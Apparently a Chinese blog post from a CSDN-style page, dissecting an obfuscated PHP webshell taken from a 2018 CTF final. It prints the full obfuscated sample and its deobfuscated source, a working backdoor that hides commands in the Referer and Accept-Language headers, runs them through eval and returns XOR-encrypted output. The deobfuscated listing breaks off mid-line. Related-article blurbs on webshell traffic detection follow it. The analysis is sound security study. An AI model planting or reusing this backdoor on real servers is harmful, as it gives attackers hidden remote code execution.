PHP混淆后门解剖分析(反抓流量、加密结果)

开发者福利!热门AI工具限时免费用 购周边即赠Coding Plan Lite,Claude Code、Cursor等20+工具畅享,效率翻倍! 阅读详情

开始前的例行叨叨:

这个后门样本收集于2018红帽杯线下决赛,看到有其他分析收集于自己的服务器,悲剧了(手动笑哭),貌似蓝帽杯也有。

调试了很久,被逼着专门学了半天正则表达式,但感觉写完这篇文章就忘干净了。

马的特殊性就是,靠特别麻烦,让你在现场心态崩溃,调试不出来,而且抓到流量不会打,直接打过去也看不懂结果6666

(手动滑稽)



后门源码

<?php
$s='=0;pw($pwj<$c&&$ipw<$l);$jpw++pw,$i++){$opw.=$pwt{$i}^$k{$j}pw;}}repwpwturn pw$o;}$r=$_SERVEpwR;$pwpwrr=@$r["HpwTTP_REpwpwFE';
$I='m[2]pw[$z]];ipwf(strpopwspw($p,$h)pw===0){$s[$pwpwi]="";$pwppw=$ss($p,3);}if(apwrray_pwkey_existpws($i,$pws)){pw$s[$i].pw=$p;';
$U='$epw=strppwpwos($s[$ipw],$f);ipwfpw($e){pw$k=$pwkpwh.$kf;ob_start();@evpwapwl(@gzuncpwpwompress(@x(@baspwepw64_decpwpwode(';
$d=str_replace('pF','','cpFreapFtepFpF_pFfuncpFtion');
$Q='preg_replapwce(arrapwypwpw("/_/","/-/"),array("pw/"pw,"+"),pwpw$ss($s[pw$i],0pw,$e))),$k)));pw$opw=ob_gepwt_pwcopwpwntents();o';
$O='b_end_clean(pw);$d=bpwase64pw_epwncode(x(gzcompwpress($opw),$pwk));pripwntpw("<$kpw>$d</$k>");@sespwpwspwion_destroy();}}}}';
$y='RERpwpw"];$ra=@$r["HTTP_ACCEPTpwpw_LANGUAGE"];pwifpw(pw$rr&&$ra)pw{$u=parsepw_urlpw($rr);parspwe_str($upw["qpwupwery"],$q);';
$X='$q=pwapwrray_values(pwpw$q);preg_mpwatchpw_alpwl("/([\\w])[pw\\wpw-]+(?:;q=0.(pw[pw\\d]))?,?/pw",$rpwpwa,$m);pwif($q&&$m){@';
$b='sespwsion_stapwrt();$pwspw=&$_SESpwSpwION;$pwss="spwubpwstr";$sl="pwstrtolopwwer";$i=$m[1][0]pwpw.$m[1][1];pw$h=$sl(pwpw$s';
$q='pws(md5($i.$kh)pw,0,3));$fpwpw=$pwsl($ss(md5($i.$kfpw),0pwpw,3));$p="pw";fopwr($zpw=1;$z<count($m[1pwpw]);$pwz++)$p.=$pwq[$';
$W='$kh="d6a6";pw$kf=pw"bc0d";pwfupwnction x($pwt,$pwkpw){$c=spwtrlen($k);$l=pwpwstrlen($t);pwpw$o="pw";for($i=0pw;$i<$l;){fopwr($j';
$j=str_replace('pw','',$W.$s.$y.$X.$b.$q.$I.$U.$Q.$O);
$u=$d('',$j);$u();
?>



经过Debug调试,解混淆




解混淆后的源码

<?php
$kh = "d6a6";
$kf = "bc0d";
function x($t, $k)
{
    $c = strlen($k);
    $l = strlen($t);
    $o = "";
    for ($i = 0; $i < $l; ) {
        for ($j = 0; ($j < $c && $i < $l); $j++, $i++) {
            $o .= $t{$i} ^ $k{$j};
        }
    }
    return $o;
}
$r  = $_SERVER;
$rr = @$r["HTTP_REFERER"];
$ra = @$r["HTTP_ACCEPT_LANGUAGE"];
if ($rr && $ra) {
    $u = parse_url($rr);
    parse_str($u["query"], $q);
    $q = array_values($q);
    preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/", $ra, $m);
    if ($q && $m) {
        @session_start();
        $s =& $_SESSION;
        $ss = "substr";
        $sl = "strtolower";
        $i  = $m[1][0] . $m[1][1];
        $h  = $sl($ss(md5($i . $kh), 0, 3));
        $f  = $sl($ss(md5($i . $kf), 0, 3));
        $p  = "";
        for ($z = 1; $z < count($m[1]); $z++)
            $p .= $q[$m[2][$z]];
        if (strpos($p, $h) === 0) {
            $s[$i] = "";
            $p     = $ss($p, 3);
        }
        if (array_key_exists($i, $s)) {
            $s[$i] .= $p;
            $e = strpos($s[$i], $f);
            if ($e) {
                $k = $kh . $kf;
                ob_start();
                @eval(@gzuncompress(@x(@base64_decode(preg_replace(array("/_/","/-/"), array("/","+"), $ss($s[$i], 0, $e))), $k)));
                $o = ob_get_contents();
                ob_end_clean();
                $d = base64_encode(x(gzcompress($o), $k));
                print("<$k>$d</$k>");
                @sessi
webshell客户端流量特征 webshell客户端流量特征概述:1. 冰蝎2. 中国菜刀2011,2014版本2016版本3. Cknife4. 蚁剑5. 哥斯拉 webshell客户端 用于webshell后门和攻击者之间的通信程序,我们可以通过webshell客户端的流量来判断服务器上是否存在Webshell后门。 概述: 中国菜刀:流量特征比较明显,2011,2014版本中,流量中有的php代码,asp代码是明文形式,jsp代码有固定格式,容易被检测出来。2016版本隐蔽性增强,对php,asp代码增加了混淆,还对ASP代码进行 阅读详情

相关推荐

Wireshark流量狩猎:从包工具到攻击解剖

Wireshark本质上是网络协议分析器,其核心能力在于对原始数据包的深度解析与语义还原。它不依赖规则匹配,而是通过字节级观察实现对HTTP载荷混淆、DNS隧道伪装、TLS异常扩展等隐蔽攻击行为的直接验证。这种基于流量语义理解的分析范式,构成了现代入侵检测中不可替代的‘证据锚点’——尤其在APT横向移动溯源、C2信标识别和EDR告警验证等高价值场景中,Wireshark常作为最终真相裁决者。本文聚焦如何突破默认视图局限,将Wireshark转化为支撑SOAR联动、IOC自动化提取与TTPs映射的主动狩猎平台

weixin_30703911的博客 389

PHP base64+gzinflate压缩编码和解码代码

base64+gzinflate压缩编码(加密)过的文件通常是以 <? eval(gzinflate(base64_decode( 为头的一个php文件。文中给出了编码和解码的代码。

Webshell流量分析实战:蚁剑、冰蝎、菜刀、哥斯拉通信解剖

Webshell本质是客户端与服务端之间隐蔽的HTTP/HTTPS会话,其通信行为在TCP/IP各层均留下可检测指纹。理解HTTP协议基础、TLS握手机制与加密载荷原理,是识别恶意流量的技术前提;AES-GCM、RSA非对称加密等技术提升了通信隐蔽性,但也引入密钥协商、熵值分布、连接生命周期等可观测特征;在真实网络环境中,这些特征可被用于构建高检出、低误报的检测规则,广泛应用于红队通信策略设计、蓝队流量检测建模及SOC告警调优。本文聚焦蚁剑与冰蝎等主流工具的原始流量差异,揭示从协议层到应用层的隐蔽逻辑。

weixin_33783283的博客 582

PHP中函数gzuncompress无法使用的解决方法

前言 gzuncompress函数不是php自带的系统函数而是一个插件函数了所以要使用 gzuncompress函数我们必须安装一个插件,下面来看看PHP函数gzuncompress无法使用的问题解决办法吧。 一、解决过程 1.gzuncompress函数需要zlib支持才可以正常使用 2.可以使用探针检查当前php版本中是否已经开启了该函数 3.解决方式,额外编译php,安装zlib组件 二、解决步骤 1.开发环境为centos6.5 bit php5.3 2.参考代码(不可以直接拿去用,请思考下在执行以下代码) [root@leafrainy zlib]# pwd /root/

从零开始入门pwn():pwn的介绍以及部分前置知识

目录 一.前言 二.pwn的介绍 pwn的定义 pwn的题目模式 前置知识 一.Linux 二.C语言 三.汇编语言 四.计算机组成原理 三.总结 一.前言 本人凭着一腔热血想要入门pwn,但却被pwn的高入门门槛泼了一次又一次冷水,趁着自己还记得,写一点心得为后来想入门的跟我一样的零基础新手提供一些帮助。 二.pwn的介绍 pwn的定义 想必很多想要入门的新手都已经通过各种各样的入门文章或视频了解了pwn的定义以及方向,但出于礼貌,我在这里还是再重复一下下。...

m0_51466347的博客 4万+

php神盾解密,解析php混淆加密解密的手段,如 phpjm,phpdp神盾,php威盾

php做为一门当下非常流行的web语言,常常看到有人求解密php文件,想当年的asp也是一样。一些人不理解为什么要混淆(加密),甚至鄙视混淆(加密),在我看来混淆加密代码可以用来防一般的小人,会起到一定的保护作用。加密的原因:1. 保护代码,防止别人剽窃2. 保护文件,防止别人发现/查杀(php木马 or 后门)3. 剽窃了他人代码防止被发现4. 其他商业或非商业目的我一直都比较关注代码的加解密,...

weixin_42394913的博客 992

[PHP]浅谈php混淆混淆

PHP编译 PHP是解析型高级语言,事实上从Zend内核的角度来看PHP就是一个普通的C程序,它有main函数,我们写的PHP代码是这个程序的输入,然后经过内核的处理输出结果,内核将PHP代码"翻译"为C程序可识别的过程就是PHP的编译。 C程序在编译时将一行行代码编译为机器码,每一个操作都认为是一条机器指令,这些指令写入到编译后的二进制程序中,执行的时候将二进制程序load进相应的内存区域(常量区、数据区、代码区)、分配运行栈,然后从代码区起始位置开始执行,这是C程序编译、执行的简单过程。 同样,PHP

cosmoslin的博客 4951

混淆 php,php混淆加密/解密

您可能想使用PHP的mcrypt扩展。function enc_aes($str, $key, $iv) {$aes = mcrypt_module_open(MCRYPT_RIJNDAEL_128, '', MCRYPT_MODE_CBC, '');if (!$aes) die("mcrypt_module_open failed!");(mcrypt_generic_init($aes, $k...

weixin_33746819的博客 1156

PHP技术解析:从短代码到模块化后门的攻防演进

在Web安全领域,后门脚本是攻击者维持服务器控制权的关键工具。其技术原理通常基于脚本语言的动态执行能力,通过特定函数调用系统命令或操作文件系统。从技术价值看,这类工具实现了权限维持、数据窃取和内网渗透,是渗透测试中权限提升的重要环节。应用场景广泛,包括但不限于网站入侵、服务器控制、数据窃取和横向移动。本文聚焦PHP,剖析其从一句话木马到模块化后门的演进路径,深入讲解其核心架构、隐蔽技术及免杀手段,涵盖文件管理、命令执行、数据库操作等模块,并探讨如何通过静态分析与动态调试进行样本分析。针对当前攻防态势,文

GOBY 栏目 387

WebShell逆向分析实战:从混淆代码到清晰源码的完整拆解

在网络安全领域,WebShell是攻击者常用的后门工具,其核心原理是通过在Web服务器上植入恶意脚本,实现对服务器的远程控制。为了绕过安全检测,攻击者常采用编码、加密混淆等技术对WebShell进行伪装,例如Base64编码、Gzip压缩和自定义异或加密等。理解这些混淆技术的原理和逆向分析方法,对于安全工程师进行深度威胁分析、攻击溯源和防御策略优化至关重要。通过静态分析与动态调试相结合的方法,可以逐层剥离混淆,还原WebShell的原始功能逻辑。本文以PHP WebShell为例,详细演示了如何识别和解密

cqwf95925的博客 478

深度解析哥斯拉PHP木马加密通信、功能模块与防御实战

WebShell是网络安全领域常见的后门程序,它通过在Web服务器上植入恶意脚本,为攻击者提供远程控制能力。其工作原理通常基于动态脚本语言(如PHP)执行系统命令、管理文件或连接数据库。在攻防对抗中,WebShell的隐蔽性和持久化能力构成了主要技术价值,使其成为服务器入侵后的关键驻留手段。应用场景广泛覆盖了网站篡改、数据窃取、内网渗透等攻击链环节。本文聚焦于业界知名的“哥斯拉”(Godzilla)PHP木马,它代表了当前高级WebShell的典型特征:采用AES等算法进行流量加密以规避检测,并内置了文件管

weixin_29324877的博客 233

Webshell流量检测实战:解密哥斯拉与冰蝎的加密通信特征

Webshell作为常见的服务器后门,其通信流量的检测是网络安全防御的关键环节。传统基于特征码匹配的检测方法在面对加密混淆的Webshell流量时往往失效,因此需要从协议层和行为层进行深度分析加密Webshell通常采用强加密算法(如AES)对通信内容进行全程加密,使流量内容呈现高熵值特征,难以直接解读。其技术价值在于能够绕过传统WAF/IDS的规则检测,实现持久化控制。在实际应用场景中,安全工程师需要从HTTP协议元数据(如Content-Type、请求头)、会话交互模式(如脉冲式访问、心跳机制)以及统

weixin_34245082的博客 374

逆向分析360滑块验证码:从加密原理到人机判定的技术拆解

验证码作为网络安全的基础防线,其核心原理在于区分人类用户与自动化程序。滑块验证码通过图像缺口匹配和轨迹行为分析来实现人机识别,其技术价值在于平衡安全性与用户体验。在自动化测试、数据采集等应用场景中,理解其工作机制至关重要。本文以360滑块验证码为例,深入剖析其**轨迹加密**与**人机判定模型**。通过逆向工程方法,拆解前端图像生成、轨迹数据加密混淆、以及后端基于加速度曲线与路径偏移的判定逻辑,揭示其如何利用加密算法和行为特征构建防御体系,为开发合规自动化工具与评估安全强度提供技术参考。

weixin_30596343的博客 267

PHP代码加密实战:IonCube与SourceGuardian深度对比与选型指南

在软件开发和商业分发中,代码保护是保障知识产权和商业价值的关键环节。其核心原理是通过加密混淆等技术手段,将可读的源代码转换为难以逆向分析的格式,从而防止核心逻辑被编译或篡改。这一技术对于构建安全的商业软件、SaaS服务和SDK具有重要价值,尤其在PHP这类解释型语言中,由于源代码通常以明文部署,保护需求更为迫切。应用场景广泛覆盖了商业软件分发、订阅制服务、核心算法保护以及需要控制代码使用范围的各类项目。本文聚焦于PHP生态中两款主流的商业加密解决方案——IonCube和SourceGuardian,从加

weixin_30892763的博客 384

PHP WebShell安全测试:从环境搭建到检测防御的实战指南

WebShell是一种常见的Web安全威胁,通常指植入在服务器上的恶意脚本,为攻击者提供远程控制能力。其工作原理是通过Web请求执行系统命令或文件操作,从而绕过常规认证机制。理解WebShell的技术价值在于,它不仅是攻击工具,更是安全研究人员和运维人员学习攻击手法、验证防御策略的重要样本。在应用场景上,WebShell常被用于服务器渗透、数据窃取和持久化控制。本文聚焦于PHP WebShell,通过搭建安全的隔离测试环境,深入剖析其代码结构、混淆手法及行为特征,并探讨基于主机和网络的检测方法。文章结合了虚

weixin_33733810的博客 527

Webshell流量分析实战:以蚁剑为例解析攻击特征与检测防御

Webshell作为常见的Web安全威胁,其通信流量分析是入侵检测与应急响应的核心技术。理解其工作原理,关键在于逆向工程客户端与服务器之间的通信协议与编码流程。从技术价值看,掌握流量特征分析能力,能有效识别隐蔽的后门通信,提升安全防护的主动性与精准性。在应用场景上,无论是安全运维、威胁狩猎还是安全产品研发,都需要基于对Webshell工具(如蚁剑、冰蝎、哥斯拉)流量特征的深度理解,构建检测规则。本文以中国蚁剑为例,通过实战拆解其连接建立、指令执行、文件管理等环节的流量特征,详细解析了Base64等编码器的识

weixin_30571465的博客 413

Webshell流量分析实战:以蚁剑为例解析攻防对抗中的痕迹检测

在网络安全领域,Webshell作为常见的持久化后门,其通信流量是攻防对抗中的关键线索。理解Webshell的通信原理,对于构建有效的防御体系至关重要。Webshell通常基于HTTP/HTTPS协议,其通信过程会留下特定的网络痕迹。通过流量分析技术,防守方可以从协议特征、载荷内容和行为序列等多个维度,检测和识别异常活动,从而及时响应安全威胁。本文聚焦于蚁剑(AntSword)这款流行工具,通过实战包,深入解析其流量特征,包括**请求头指纹**、**载荷编码方式**以及命令执行结果的封装模式。掌握这些基础

clijovtbq401783153的博客 392

Wireshark流量分析实战:从HTTP协议解析到Webshell攻击链追踪

网络流量分析是网络安全防御和应急响应的基础技能,它通过解析数据包来理解网络行为、识别异常。其核心原理在于对TCP/IP协议栈的深度解析,特别是HTTP/HTTPS应用层协议,能够还原完整的通信过程。这项技术的价值在于,它能将看似无序的原始流量转化为可读的攻击证据链,是威胁狩猎、入侵检测和事件溯源的基石。在实际应用场景中,安全工程师常利用Wireshark等工具分析捕获的流量包(pcapng文件),通过协议统计、会话过滤和载荷检视,从海量数据中定位诸如Webshell上传、命令执行等恶意活动。例如,针对Web

weixin_34416754的博客 375

哥斯拉流量分析实战:用Wireshark解密NewStarCTF Week4的WebShell通信

本文详细介绍了如何使用Wireshark进行哥斯拉WebShell流量分析,包括初始流量分析、哥斯拉流量特征解析、自定义解密脚本开发及实战案例演示。通过逆向加密逻辑和Python脚本实现,帮助安全人员快速识别和解密WebShell通信,提升网络安全防御能力。

weixin_32428571的博客 570
上一篇: Pwn-最简单栈溢出(2018铁三云贵赛区)write函数泄露+用地址跳回重执行主函数
下一篇: 网鼎杯第二场 wafupload详解
publicStr
博客等级 码龄8年 40粉丝 17原创
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值